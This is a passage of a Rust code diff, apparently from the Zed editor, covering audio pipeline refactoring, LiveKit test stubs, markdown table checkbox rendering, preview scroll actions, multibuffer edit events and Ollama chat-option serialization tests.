- .unbounded_send(AudioFrame {
- data: Cow::Owned(sampled),
- sample_rate,
- num_channels,
- samples_per_channel: sample_rate / 100,
+ .try_send(TimestampedFrame {
+ frame: AudioFrame {
+ data: Cow::Owned(sampled),
+ sample_rate,
+ num_channels,
+ samples_per_channel: sample_rate / 100,
+ },
+ captured_at,
})
.ok();
}
@@ -420,7 +407,7 @@ impl AudioStack {
})
.log_err();
})
- .unwrap();
+ .detach();
device_change_listener.next().await;
drop(end_on_drop_tx)
@@ -428,39 +415,73 @@ impl AudioStack {
}
}
-#[derive(Serialize, Deserialize, Debug)]
-pub struct Speaker {
- pub name: String,
- pub is_staff: bool,
- pub sends_legacy_audio: bool,
+/// This allows using of Rodio's effects library within our home brewn audio
+/// pipeline. The alternative would be inlining Rodio's effects which is
+/// problematic from a legal stance. We would then have to make clear that code
+/// is not owned by zed-industries while the code would be surrounded by
+/// zed-industries owned code.
+///
+/// This adaptor does incur a slight performance penalty (copying into a
+/// pre-allocated vec and back) however the impact will be immeasurably low.
+///
+/// There is no latency impact.
+pub struct RodioEffectsAdaptor {
+ input: Vec<rodio::Sample>,
+ pos: usize,
}
-fn send_to_livekit(frame_tx: UnboundedSender<AudioFrame<'static>>, mut microphone: impl Source) {
- use cpal::Sample;
- let sample_rate = microphone.sample_rate().get();
- let num_channels = microphone.channels().get() as u32;
- let buffer_size = sample_rate / 100 * num_channels;
-
- loop {
- let sampled: Vec<_> = microphone
- .by_ref()
- .take(buffer_size as usize)
- .map(|s| s.to_sample())
- .collect();
-
- if frame_tx
- .unbounded_send(AudioFrame {
- sample_rate,
- num_channels,
- samples_per_channel: sampled.len() as u32 / num_channels,
- data: Cow::Owned(sampled),
- })
- .is_err()
- {
- // must rx has dropped or is not consuming
- break;
+impl RodioEffectsAdaptor {
+ // This implementation incorrect terminology confusing everyone. A normal
+ // audio frame consists of all samples for one moment in time (one for mono,
+ // two for stereo). Here a frame of audio refers to a 10ms buffer of samples.
+ fn new(samples_per_frame: usize) -> Self {
+ Self {
+ input: Vec::with_capacity(samples_per_frame),
+ pos: 0,
}
}
+
+ fn fill_buffer_with(&mut self, integer_samples: &[i16]) {
+ self.input.clear();
+ self.input.extend(SampleTypeConverter::<_, f32>::new(
+ integer_samples.iter().copied(),
+ ));
+ self.pos = 0;
+ }
+}
+
+impl Iterator for RodioEffectsAdaptor {
+ type Item = rodio::Sample;
+
+ fn next(&mut self) -> Option<Self::Item> {
+ let sample = self.input.get(self.pos)?;
+ self.pos += 1;
+ Some(*sample)
+ }
+}
+
+impl rodio::Source for RodioEffectsAdaptor {
+ fn current_span_len(&self) -> Option<usize> {
+ None
+ }
+
+ fn channels(&self) -> rodio::ChannelCount {
+ rodio::nz!(2)
+ }
+
+ fn sample_rate(&self) -> rodio::SampleRate {
+ rodio::nz!(48000)
+ }
+
+ fn total_duration(&self) -> Option<Duration> {
+ None
+ }
+}
+
+#[derive(Serialize, Deserialize, Debug)]
+pub struct Speaker {
+ pub name: String,
+ pub is_staff: bool,
}
use super::LocalVideoTrack;
@@ -1,92 +0,0 @@
-use std::num::NonZero;
-
-use futures::StreamExt;
-use libwebrtc::{audio_stream::native::NativeAudioStream, prelude::AudioFrame};
-use livekit::track::RemoteAudioTrack;
-use rodio::{
- ChannelCount, SampleRate, Source, buffer::SamplesBuffer, conversions::SampleTypeConverter,
-};
-
-use audio::{CHANNEL_COUNT, LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE, SAMPLE_RATE};
-
-fn frame_to_samplesbuffer(frame: AudioFrame) -> SamplesBuffer {
- let samples = frame.data.iter().copied();
- let samples = SampleTypeConverter::<_, _>::new(samples);
- let samples: Vec<f32> = samples.collect();
- SamplesBuffer::new(
- NonZero::new(frame.num_channels as u16).expect("zero channels is nonsense"),
- NonZero::new(frame.sample_rate).expect("samplerate zero is nonsense"),
- samples,
- )
-}
-
-pub struct LiveKitStream {
- // shared_buffer: SharedBuffer,
- inner: rodio::queue::SourcesQueueOutput,
- _receiver_task: gpui::Task<()>,
- channel_count: ChannelCount,
- sample_rate: SampleRate,
-}
-
-impl LiveKitStream {
- pub fn new(
- executor: &gpui::BackgroundExecutor,
- track: &RemoteAudioTrack,
- legacy: bool,
- ) -> Self {
- let (channel_count, sample_rate) = if legacy {
- (LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE)
- } else {
- (CHANNEL_COUNT, SAMPLE_RATE)
- };
-
- let mut stream = NativeAudioStream::new(
- track.rtc_track(),
- sample_rate.get() as i32,
- channel_count.get().into(),
- );
- let (queue_input, queue_output) = rodio::queue::queue(true);
- // spawn rtc stream
- let receiver_task = executor.spawn_with_priority(gpui::Priority::RealtimeAudio, {
- async move {
- while let Some(frame) = stream.next().await {
- let samples = frame_to_samplesbuffer(frame);
- queue_input.append(samples);
- }
- }
- });
-
- LiveKitStream {
- _receiver_task: receiver_task,
- inner: queue_output,
- sample_rate,
- channel_count,
- }
- }
-}
-
-impl Iterator for LiveKitStream {
- type Item = rodio::Sample;
-
- fn next(&mut self) -> Option<Self::Item> {
- self.inner.next()
- }
-}
-
-impl Source for LiveKitStream {
- fn current_span_len(&self) -> Option<usize> {
- self.inner.current_span_len()
- }
-
- fn channels(&self) -> rodio::ChannelCount {
- self.channel_count
- }
-
- fn sample_rate(&self) -> rodio::SampleRate {
- self.sample_rate
- }
-
- fn total_duration(&self) -> Option<std::time::Duration> {
- self.inner.total_duration()
- }
-}
@@ -15,7 +15,7 @@ pub type LocalTrackPublication = publication::LocalTrackPublication;
pub type LocalParticipant = participant::LocalParticipant;
pub type Room = test::Room;
-pub use test::{ConnectionState, ParticipantIdentity, TrackSid};
+pub use test::{ConnectionState, ParticipantIdentity, RtcStats, SessionStats, TrackSid};
pub struct AudioStream {}
@@ -1,6 +1,6 @@
use crate::{
- AudioStream, LocalAudioTrack, LocalTrackPublication, LocalVideoTrack, Participant,
- ParticipantIdentity, RemoteTrack, RemoteTrackPublication, TrackSid,
+ AudioStream, ConnectionQuality, LocalAudioTrack, LocalTrackPublication, LocalVideoTrack,
+ Participant, ParticipantIdentity, RemoteTrack, RemoteTrackPublication, TrackSid,
test::{Room, WeakRoom},
};
use anyhow::Result;
@@ -8,6 +8,7 @@ use collections::HashMap;
use gpui::{
AsyncApp, DevicePixels, ScreenCaptureSource, ScreenCaptureStream, SourceMetadata, size,
};
+use std::sync::{Arc, atomic::AtomicU64};
#[derive(Clone, Debug)]
pub struct LocalParticipant {
@@ -28,9 +29,31 @@ impl Participant {
Participant::Remote(participant) => participant.identity.clone(),
}
}
+
+ pub fn connection_quality(&self) -> ConnectionQuality {
+ match self {
+ Participant::Local(p) => p.connection_quality(),
+ Participant::Remote(p) => p.connection_quality(),
+ }
+ }
+
+ pub fn audio_level(&self) -> f32 {
+ match self {
+ Participant::Local(p) => p.audio_level(),
+ Participant::Remote(p) => p.audio_level(),
+ }
+ }
}
impl LocalParticipant {
+ pub fn connection_quality(&self) -> ConnectionQuality {
+ ConnectionQuality::Excellent
+ }
+
+ pub fn audio_level(&self) -> f32 {
+ 0.0
+ }
+
pub async fn unpublish_track(&self, track: TrackSid, _cx: &AsyncApp) -> Result<()> {
self.room
.test_server()
@@ -41,7 +64,7 @@ impl LocalParticipant {
pub(crate) async fn publish_microphone_track(
&self,
_cx: &AsyncApp,
- ) -> Result<(LocalTrackPublication, AudioStream)> {
+ ) -> Result<(LocalTrackPublication, AudioStream, Arc<AtomicU64>)> {
let this = self.clone();
let server = this.room.test_server();
let sid = server
@@ -54,6 +77,7 @@ impl LocalParticipant {
sid,
},
AudioStream {},
+ Arc::new(AtomicU64::new(0)),
))
}
@@ -75,9 +99,42 @@ impl LocalParticipant {
Box::new(TestScreenCaptureStream {}),
))
}
+
+ #[cfg(target_os = "linux")]
+ pub async fn publish_screenshare_track_wayland(
+ &self,
+ _cx: &mut AsyncApp,
+ ) -> Result<(
+ LocalTrackPublication,
+ Box<dyn ScreenCaptureStream>,
+ futures::channel::oneshot::Receiver<()>,
+ )> {
+ let (_failure_tx, failure_rx) = futures::channel::oneshot::channel();
+ let this = self.clone();
+ let server = this.room.test_server();
+ let sid = server
+ .publish_video_track(this.room.token(), LocalVideoTrack {})
+ .await?;
+ Ok((
+ LocalTrackPublication {
+ room: self.room.downgrade(),
+ sid,
+ },
+ Box::new(TestWaylandScreenCaptureStream::new()),
+ failure_rx,
+ ))
+ }
}
impl RemoteParticipant {
+ pub fn connection_quality(&self) -> ConnectionQuality {
+ ConnectionQuality::Excellent
+ }
+
+ pub fn audio_level(&self) -> f32 {
+ 0.0
+ }
+
pub fn track_publications(&self) -> HashMap<TrackSid, RemoteTrackPublication> {
if let Some(room) = self.room.upgrade() {
let server = room.test_server();
@@ -134,3 +191,32 @@ impl ScreenCaptureStream for TestScreenCaptureStream {
})
}
}
+
+#[cfg(target_os = "linux")]
+static NEXT_TEST_WAYLAND_SHARE_ID: AtomicU64 = AtomicU64::new(1);
+
+#[cfg(target_os = "linux")]
+struct TestWaylandScreenCaptureStream {
+ id: u64,
+}
+
+#[cfg(target_os = "linux")]
+impl TestWaylandScreenCaptureStream {
+ fn new() -> Self {
+ Self {
+ id: NEXT_TEST_WAYLAND_SHARE_ID.fetch_add(1, std::sync::atomic::Ordering::Relaxed),
+ }
+ }
+}
+
+#[cfg(target_os = "linux")]
+impl ScreenCaptureStream for TestWaylandScreenCaptureStream {
+ fn metadata(&self) -> Result<SourceMetadata> {
+ Ok(SourceMetadata {
+ id: self.id,
+ is_main: None,
+ label: None,
+ resolution: size(DevicePixels(1), DevicePixels(1)),
+ })
+ }
+}
@@ -10,7 +10,7 @@ use parking_lot::Mutex;
use postage::{mpsc, sink::Sink};
use std::sync::{
Arc, Weak,
- atomic::{AtomicBool, Ordering::SeqCst},
+ atomic::{AtomicBool, AtomicU64, Ordering::SeqCst},
};
#[derive(Clone, Debug, Eq, Hash, PartialEq, PartialOrd, Ord)]
@@ -40,6 +40,15 @@ pub enum ConnectionState {
Disconnected,
}
+#[derive(Clone, Debug, Default)]
+pub struct SessionStats {
+ pub publisher_stats: Vec<RtcStats>,
+ pub subscriber_stats: Vec<RtcStats>,
+}
+
+#[derive(Clone, Debug)]
+pub enum RtcStats {}
+
static SERVERS: Mutex<BTreeMap<String, Arc<TestServer>>> = Mutex::new(BTreeMap::new());
pub struct TestServer {
@@ -739,9 +748,17 @@ impl Room {
_track_name: String,
_is_staff: bool,
cx: &mut AsyncApp,
- ) -> Result<(LocalTrackPublication, AudioStream)> {
+ ) -> Result<(LocalTrackPublication, AudioStream, Arc<AtomicU64>)> {
self.local_participant().publish_microphone_track(cx).await
}
+
+ pub async fn get_stats(&self) -> Result<SessionStats> {
+ Ok(SessionStats::default())
+ }
+
+ pub fn stats_task(&self, _cx: &impl gpui::AppContext) -> gpui::Task<Result<SessionStats>> {
+ gpui::Task::ready(Ok(SessionStats::default()))
+ }
}
impl Drop for RoomState {
@@ -1306,6 +1306,29 @@ impl LanguageServer {
self.version.clone()
}
+ /// Get the readable version of the running language server.
+ pub fn readable_version(&self) -> Option<SharedString> {
+ match self.name().as_ref() {
+ "gopls" => {
+ // Gopls returns a detailed JSON object as its version string; we must parse it to extract the semantic version.
+ // Example: `{"GoVersion":"go1.26.0","Path":"golang.org/x/tools/gopls","Main":{},"Deps":[],"Settings":[],"Version":"v0.21.1"}`
+ self.version
+ .as_ref()
+ .and_then(|obj| {
+ #[derive(Deserialize)]
+ struct GoplsVersion<'a> {
+ #[serde(rename = "Version")]
+ version: &'a str,
+ }
+ let parsed: GoplsVersion = serde_json::from_str(obj.as_str()).ok()?;
+ Some(parsed.version.trim_start_matches("v").to_owned().into())
+ })
+ .or_else(|| self.version.clone())
+ }
+ _ => self.version.clone(),
+ }
+ }
+
/// Get the process name of the running language server.
pub fn process_name(&self) -> &str {
&self.process_name
@@ -1271,18 +1271,23 @@ impl Element for MarkdownElement {
builder.table.start(alignments.clone());
let column_count = alignments.len();
+ builder.push_div(
+ div().flex().flex_col().items_start(),
+ range,
+ markdown_end,
+ );
builder.push_div(
div()
.id(("table", range.start))
+ .min_w_0()
.grid()
.grid_cols(column_count as u16)
.when(self.style.table_columns_min_size, |this| {
this.grid_cols_min_content(column_count as u16)
})
.when(!self.style.table_columns_min_size, |this| {
- this.grid_cols(column_count as u16)
+ this.grid_cols_max_content(column_count as u16)
})
- .w_full()
.mb_2()
.border(px(1.5))
.border_color(cx.theme().colors().border)
@@ -1430,6 +1435,7 @@ impl Element for MarkdownElement {
}
}
MarkdownTagEnd::Table => {
+ builder.pop_div();
builder.pop_div();
builder.table.end();
}
@@ -1441,6 +1447,7 @@ impl Element for MarkdownElement {
builder.table.end_row();
}
MarkdownTagEnd::TableCell => {
+ builder.replace_pending_checkbox(range);
builder.pop_div();
builder.table.end_cell();
}
@@ -1926,6 +1933,28 @@ impl MarkdownElementBuilder {
}
}
+ fn replace_pending_checkbox(&mut self, source_range: &Range<usize>) {
+ let trimmed = self.pending_line.text.trim();
+ if trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]" {
+ let checked = trimmed != "[ ]";
+ self.pending_line = PendingLine::default();
+ let checkbox = Checkbox::new(
+ ElementId::Name(
+ format!("table_checkbox_{}_{}", source_range.start, source_range.end).into(),
+ ),
+ if checked {
+ ToggleState::Selected
+ } else {
+ ToggleState::Unselected
+ },
+ )
+ .fill()
+ .visualization_only(true)
+ .into_any_element();
+ self.div_stack.last_mut().unwrap().extend([checkbox]);
+ }
+ }
+
fn flush_text(&mut self) {
let line = mem::take(&mut self.pending_line);
if line.text.is_empty() {
@@ -2493,6 +2522,48 @@ mod tests {
assert_eq!(second_word, "b");
}
+ #[test]
+ fn test_table_checkbox_detection() {
+ let md = "| Done |\n|------|\n| [x] |\n| [ ] |";
+ let (events, _, _) = crate::parser::parse_markdown(md);
+
+ let mut in_table = false;
+ let mut cell_texts: Vec<String> = Vec::new();
+ let mut current_cell = String::new();
+
+ for (range, event) in &events {
+ match event {
+ MarkdownEvent::Start(MarkdownTag::Table(_)) => in_table = true,
+ MarkdownEvent::End(MarkdownTagEnd::Table) => in_table = false,
+ MarkdownEvent::Start(MarkdownTag::TableCell) => current_cell.clear(),
+ MarkdownEvent::End(MarkdownTagEnd::TableCell) => {
+ if in_table {
+ cell_texts.push(current_cell.clone());
+ }
+ }
+ MarkdownEvent::Text if in_table => {
+ current_cell.push_str(&md[range.clone()]);
+ }
+ _ => {}
+ }
+ }
+
+ let checkbox_cells: Vec<&String> = cell_texts
+ .iter()
+ .filter(|t| {
+ let trimmed = t.trim();
+ trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]"
+ })
+ .collect();
+ assert_eq!(
+ checkbox_cells.len(),
+ 2,
+ "Expected 2 checkbox cells, got: {cell_texts:?}"
+ );
+ assert_eq!(checkbox_cells[0].trim(), "[x]");
+ assert_eq!(checkbox_cells[1].trim(), "[ ]");
+ }
+
#[gpui::test]
fn test_inline_code_word_selection_excludes_backticks(cx: &mut TestAppContext) {
// Test that double-clicking on inline code selects just the code content,
@@ -19,7 +19,6 @@ anyhow.workspace = true
async-recursion.workspace = true
collections.workspace = true
editor.workspace = true
-fs.workspace = true
gpui.workspace = true
html5ever.workspace = true
language.workspace = true
@@ -30,6 +29,7 @@ markup5ever_rcdom.workspace = true
pretty_assertions.workspace = true
pulldown-cmark.workspace = true
settings.workspace = true
+stacksafe.workspace = true
theme.workspace = true
ui.workspace = true
urlencoding.workspace = true
@@ -10,6 +10,7 @@ use language::LanguageRegistry;
use markdown::parser::PARSE_OPTIONS;
use markup5ever_rcdom::RcDom;
use pulldown_cmark::{Alignment, Event, Parser, Tag, TagEnd};
+use stacksafe::stacksafe;
use std::{
cell::RefCell, collections::HashMap, mem, ops::Range, path::PathBuf, rc::Rc, sync::Arc, vec,
};
@@ -907,6 +908,7 @@ impl<'a> MarkdownParser<'a> {
elements
}
+ #[stacksafe]
fn parse_html_node(
&self,
source_range: Range<usize>,
@@ -1013,6 +1015,7 @@ impl<'a> MarkdownParser<'a> {
}
}
+ #[stacksafe]
fn parse_paragraph(
&self,
source_range: Range<usize>,
@@ -2773,6 +2776,35 @@ Some other content
);
}
+ #[gpui::test]
+ async fn test_table_with_checkboxes() {
+ let markdown = "\
+| Done | Task |
+|------|---------|
+| [x] | Fix bug |
+| [ ] | Add feature |";
+
+ let parsed = parse(markdown).await;
+ let table = match &parsed.children[0] {
+ ParsedMarkdownElement::Table(table) => table,
+ other => panic!("Expected table, got: {:?}", other),
+ };
+
+ let first_cell = &table.body[0].columns[0];
+ let first_cell_text = match &first_cell.children[0] {
+ MarkdownParagraphChunk::Text(t) => t.contents.to_string(),
+ other => panic!("Expected text chunk, got: {:?}", other),
+ };
+ assert_eq!(first_cell_text.trim(), "[x]");
+
+ let second_cell = &table.body[1].columns[0];
+ let second_cell_text = match &second_cell.children[0] {
+ MarkdownParagraphChunk::Text(t) => t.contents.to_string(),
+ other => panic!("Expected text chunk, got: {:?}", other),
+ };
+ assert_eq!(second_cell_text.trim(), "[ ]");
+ }
+
#[gpui::test]
async fn test_list_basic() {
let parsed = parse(
@@ -26,6 +26,10 @@ actions!(
ScrollUpByItem,
/// Scrolls down by one markdown element in the markdown preview
ScrollDownByItem,
+ /// Scrolls to the top of the markdown preview.
+ ScrollToTop,
+ /// Scrolls to the bottom of the markdown preview.
+ ScrollToBottom,
/// Opens a following markdown preview that syncs with the editor.
OpenFollowingPreview
]
@@ -8,7 +8,7 @@ use editor::scroll::Autoscroll;
use editor::{Editor, EditorEvent, MultiBufferOffset, SelectionEffects};
use gpui::{
App, ClickEvent, Context, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement,
- IntoElement, IsZero, ListState, ParentElement, Render, RetainAllImageCache, Styled,
+ IntoElement, IsZero, ListOffset, ListState, ParentElement, Render, RetainAllImageCache, Styled,
Subscription, Task, WeakEntity, Window, list,
};
use language::LanguageRegistry;
@@ -26,7 +26,7 @@ use crate::{
markdown_parser::parse_markdown,
markdown_renderer::{RenderContext, render_markdown_block},
};
-use crate::{ScrollDown, ScrollDownByItem, ScrollUp, ScrollUpByItem};
+use crate::{ScrollDown, ScrollDownByItem, ScrollToBottom, ScrollToTop, ScrollUp, ScrollUpByItem};
const REPARSE_DEBOUNCE: Duration = Duration::from_millis(200);
@@ -277,6 +277,7 @@ impl MarkdownPreviewView {
|this, editor, event: &EditorEvent, window, cx| {
match event {
EditorEvent::Edited { .. }
+ | EditorEvent::BufferEdited { .. }
| EditorEvent::DirtyChanged
| EditorEvent::ExcerptsEdited { .. } => {
this.parse_markdown_from_active_editor(true, window, cx);
@@ -510,6 +511,30 @@ impl MarkdownPreviewView {
}
cx.notify();
}
+
+ fn scroll_to_top(&mut self, _: &ScrollToTop, _window: &mut Window, cx: &mut Context<Self>) {
+ self.list_state.scroll_to(ListOffset {
+ item_ix: 0,
+ offset_in_item: px(0.),
+ });
+ cx.notify();
+ }
+
+ fn scroll_to_bottom(
+ &mut self,
+ _: &ScrollToBottom,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ let count = self.list_state.item_count();
+ if count > 0 {
+ self.list_state.scroll_to(ListOffset {
+ item_ix: count - 1,
+ offset_in_item: px(0.),
+ });
+ }
+ cx.notify();
+ }
}
impl Focusable for MarkdownPreviewView {
@@ -561,6 +586,8 @@ impl Render for MarkdownPreviewView {
.on_action(cx.listener(MarkdownPreviewView::scroll_down))
.on_action(cx.listener(MarkdownPreviewView::scroll_up_by_item))
.on_action(cx.listener(MarkdownPreviewView::scroll_down_by_item))
+ .on_action(cx.listener(MarkdownPreviewView::scroll_to_top))
+ .on_action(cx.listener(MarkdownPreviewView::scroll_to_bottom))
.size_full()
.bg(cx.theme().colors().editor_background)
.p_4()
@@ -9,7 +9,6 @@ use crate::{
markdown_preview_view::MarkdownPreviewView,
};
use collections::HashMap;
-use fs::normalize_path;
use gpui::{
AbsoluteLength, Animation, AnimationExt, AnyElement, App, AppContext as _, Context, Div,
Element, ElementId, Entity, HighlightStyle, Hsla, ImageSource, InteractiveText, IntoElement,
@@ -25,6 +24,7 @@ use std::{
};
use theme::{ActiveTheme, SyntaxTheme, ThemeSettings};
use ui::{CopyButton, LinkPreview, ToggleState, prelude::*, tooltip_container};
+use util::normalize_path;
use workspace::{OpenOptions, OpenVisible, Workspace};
pub struct CheckboxClickedEvent {
@@ -698,16 +698,15 @@ fn render_markdown_table(parsed: &ParsedMarkdownTable, cx: &mut RenderContext) -
.when_some(parsed.caption.as_ref(), |this, caption| {
this.children(render_markdown_text(caption, cx))
})
- .border_1()
- .border_color(cx.border_color)
- .rounded_sm()
- .overflow_hidden()
.child(
div()
+ .rounded_sm()
+ .overflow_hidden()
+ .border_1()
+ .border_color(cx.border_color)
.min_w_0()
- .w_full()
.grid()
- .grid_cols(max_column_count as u16)
+ .grid_cols_max_content(max_column_count as u16)
.children(cells),
)
.into_any()
@@ -891,6 +890,24 @@ fn render_markdown_text(parsed_new: &MarkdownParagraph, cx: &mut RenderContext)
for parsed_region in parsed_new {
match parsed_region {
MarkdownParagraphChunk::Text(parsed) => {
+ let trimmed = parsed.contents.trim();
+ if trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]" {
+ let checked = trimmed != "[ ]";
+ let element = div()
+ .child(MarkdownCheckbox::new(
+ cx.next_id(&parsed.source_range),
+ if checked {
+ ToggleState::Selected
+ } else {
+ ToggleState::Unselected
+ },
+ cx.clone(),
+ ))
+ .into_any();
+ any_element.push(element);
+ continue;
+ }
+
let element_id = cx.next_id(&parsed.source_range);
let highlights = gpui::combine_highlights(
@@ -119,6 +119,7 @@ pub enum Event {
DiffHunksToggled,
Edited {
edited_buffer: Option<Entity<Buffer>>,
+ is_local: bool,
},
TransactionUndone {
transaction_id: TransactionId,
@@ -1912,6 +1913,7 @@ impl MultiBuffer {
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
cx.emit(Event::ExcerptsAdded {
buffer,
@@ -1974,6 +1976,7 @@ impl MultiBuffer {
}
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
cx.emit(Event::ExcerptsRemoved {
ids,
@@ -2138,7 +2141,7 @@ impl MultiBuffer {
if point < start {
found = Some((start, excerpt_id));
}
- if point > end {
+ if point >= end {
found = Some((end, excerpt_id));
}
}
@@ -2330,6 +2333,7 @@ impl MultiBuffer {
}
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
cx.emit(Event::ExcerptsRemoved {
ids,
@@ -2394,8 +2398,9 @@ impl MultiBuffer {
use language::BufferEvent;
let buffer_id = buffer.read(cx).remote_id();
cx.emit(match event {
- BufferEvent::Edited => Event::Edited {
+ &BufferEvent::Edited { is_local } => Event::Edited {
edited_buffer: Some(buffer),
+ is_local,
},
BufferEvent::DirtyChanged => Event::DirtyChanged,
BufferEvent::Saved => Event::Saved,
@@ -2485,6 +2490,7 @@ impl MultiBuffer {
}
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
}
@@ -2531,6 +2537,7 @@ impl MultiBuffer {
}
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
}
@@ -2770,6 +2777,7 @@ impl MultiBuffer {
cx.emit(Event::DiffHunksToggled);
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
}
@@ -2886,6 +2894,7 @@ impl MultiBuffer {
cx.emit(Event::DiffHunksToggled);
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
}
@@ -2953,6 +2962,7 @@ impl MultiBuffer {
}
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
cx.emit(Event::ExcerptsExpanded { ids: vec![id] });
cx.notify();
@@ -3060,6 +3070,7 @@ impl MultiBuffer {
}
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
cx.emit(Event::ExcerptsExpanded { ids });
cx.notify();
@@ -3703,6 +3714,7 @@ impl MultiBuffer {
cx.emit(Event::DiffHunksToggled);
cx.emit(Event::Edited {
edited_buffer: None,
+ is_local: true,
});
}
}
@@ -5177,6 +5189,11 @@ impl MultiBufferSnapshot {
}
}
+ pub fn line_len_utf16(&self, row: MultiBufferRow) -> u32 {
+ self.clip_point_utf16(Unclipped(PointUtf16::new(row.0, u32::MAX)), Bias::Left)
+ .column
+ }
+
pub fn buffer_line_for_row(
&self,
row: MultiBufferRow,
@@ -6335,7 +6352,7 @@ impl MultiBufferSnapshot {
pub fn runnable_ranges(
&self,
range: Range<Anchor>,
- ) -> impl Iterator<Item = (Range<MultiBufferOffset>, language::RunnableRange)> + '_ {
+ ) -> impl Iterator<Item = (Range<Anchor>, language::RunnableRange)> + '_ {
let range = range.start.to_offset(self)..range.end.to_offset(self);
self.lift_buffer_metadata(range, move |buffer, range| {
Some(
@@ -6348,7 +6365,12 @@ impl MultiBufferSnapshot {
.map(|runnable| (runnable.run_range.clone(), runnable)),
)
})
- .map(|(run_range, runnable, _)| (run_range, runnable))
+ .map(|(run_range, runnable, _)| {
+ (
+ self.anchor_after(run_range.start)..self.anchor_before(run_range.end),
+ runnable,
+ )
+ })
}
pub fn line_indents(
@@ -72,6 +72,30 @@ fn test_singleton(cx: &mut App) {
assert_consistent_line_numbers(&snapshot);
}
+#[gpui::test]
+fn test_buffer_point_to_anchor_at_end_of_singleton_buffer(cx: &mut App) {
+ let buffer = cx.new(|cx| Buffer::local("abc", cx));
+ let multibuffer = cx.new(|cx| MultiBuffer::singleton(buffer.clone(), cx));
+
+ let excerpt_id = multibuffer
+ .read(cx)
+ .excerpt_ids()
+ .into_iter()
+ .next()
+ .unwrap();
+ let anchor = multibuffer
+ .read(cx)
+ .buffer_point_to_anchor(&buffer, Point::new(0, 3), cx);
+
+ assert_eq!(
+ anchor,
+ Some(Anchor::in_buffer(
+ excerpt_id,
+ buffer.read(cx).snapshot().anchor_after(Point::new(0, 3)),
+ ))
+ );
+}
+
#[gpui::test]
fn test_remote(cx: &mut App) {
let host_buffer = cx.new(|cx| Buffer::local("a", cx));
@@ -171,12 +195,15 @@ fn test_excerpt_boundaries_and_clipping(cx: &mut App) {
&[
Event::Edited {
edited_buffer: None,
+ is_local: true,
},
Event::Edited {
edited_buffer: None,
+ is_local: true,
},
Event::Edited {
edited_buffer: None,
+ is_local: true,
}
]
);
@@ -123,10 +123,15 @@ pub struct ChatRequest {
// https://github.com/ollama/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values
#[derive(Serialize, Default, Debug)]
pub struct ChatOptions {
+ #[serde(skip_serializing_if = "Option::is_none")]
pub num_ctx: Option<u64>,
+ #[serde(skip_serializing_if = "Option::is_none")]
pub num_predict: Option<isize>,
+ #[serde(skip_serializing_if = "Option::is_none")]
pub stop: Option<Vec<String>>,
+ #[serde(skip_serializing_if = "Option::is_none")]
pub temperature: Option<f32>,
+ #[serde(skip_serializing_if = "Option::is_none")]
pub top_p: Option<f32>,
}
@@ -588,4 +593,96 @@ mod tests {
assert_eq!(message_images.len(), 1);
assert_eq!(message_images[0].as_str().unwrap(), base64_image);
}
+
+ #[test]
+ fn test_chat_options_serialization() {
+ // When stop is None, it should not appear in JSON at all
+ // This allows Ollama to use the model's default stop tokens
+ let options_no_stop = ChatOptions {
+ num_ctx: Some(4096),
+ stop: None,
+ temperature: Some(0.7),
+ ..Default::default()
+ };
+ let serialized = serde_json::to_string(&options_no_stop).unwrap();
+ assert!(
+ !serialized.contains("stop"),
+ "stop should not be in JSON when None"
+ );
+ assert!(serialized.contains("num_ctx"));
+ assert!(serialized.contains("temperature"));
+
+ // When stop has values, they should be serialized
+ let options_with_stop = ChatOptions {
+ stop: Some(vec!["<|eot_id|>".to_string()]),
+ ..Default::default()
+ };
+ let serialized = serde_json::to_string(&options_with_stop).unwrap();
+ assert!(serialized.contains("stop"));
+ assert!(serialized.contains("<|eot_id|>"));
+
+ // All None options should result in empty object
+ let options_all_none = ChatOptions::default();
+ let serialized = serde_json::to_string(&options_all_none).unwrap();
+ assert_eq!(serialized, "{}");
+ }
+
+ #[test]
+ fn test_chat_request_with_stop_tokens() {
+ let request = ChatRequest {
+ model: "rnj-1:8b".to_string(),
+ messages: vec![ChatMessage::User {
+ content: "Hello".to_string(),
+ images: None,
+ }],
+ stream: true,
+ keep_alive: KeepAlive::default(),
+ options: Some(ChatOptions {
+ stop: Some(vec!["<|eot_id|>".to_string(), "<|end|>".to_string()]),
+ ..Default::default()
+ }),
+ think: None,
+ tools: vec![],
+ };
+
+ let serialized = serde_json::to_string(&request).unwrap();
+ let parsed: serde_json::Value = serde_json::from_str(&serialized).unwrap();
+
+ let stop = parsed["options"]["stop"].as_array().unwrap();
+ assert_eq!(stop.len(), 2);
+ assert_eq!(stop[0].as_str().unwrap(), "<|eot_id|>");
+ assert_eq!(stop[1].as_str().unwrap(), "<|end|>");
+ }
+
+ #[test]
+ fn test_chat_request_without_stop_tokens_omits_field() {
+ // This tests the fix for issue #47798
+ // When no stop tokens are provided, the field should be omitted
+ // so Ollama uses the model's default stop tokens from Modelfile
+ let request = ChatRequest {
+ model: "rnj-1:8b".to_string(),
+ messages: vec![ChatMessage::User {
+ content: "Hello".to_string(),
+ images: None,
+ }],
+ stream: true,
+ keep_alive: KeepAlive::default(),
+ options: Some(ChatOptions {
+ num_ctx: Some(4096),
+ stop: None, // No stop tokens - should be omitted from JSON
+ ..Default::default()
+ }),
+ think: None,
+ tools: vec![],
+ };
+
+ let serialized = serde_json::to_string(&request).unwrap();
+
+ // The key check: "stop" should not appear in the serialized JSON
+ assert!(
+ !serialized.contains("\"stop\""),
+ "stop field should be omitted when None, got: {}",
+ serialized
+ );
+ }
}
@@ -10,9 +10,8 @@ use theme::{
ThemeSettings,
};
use ui::{
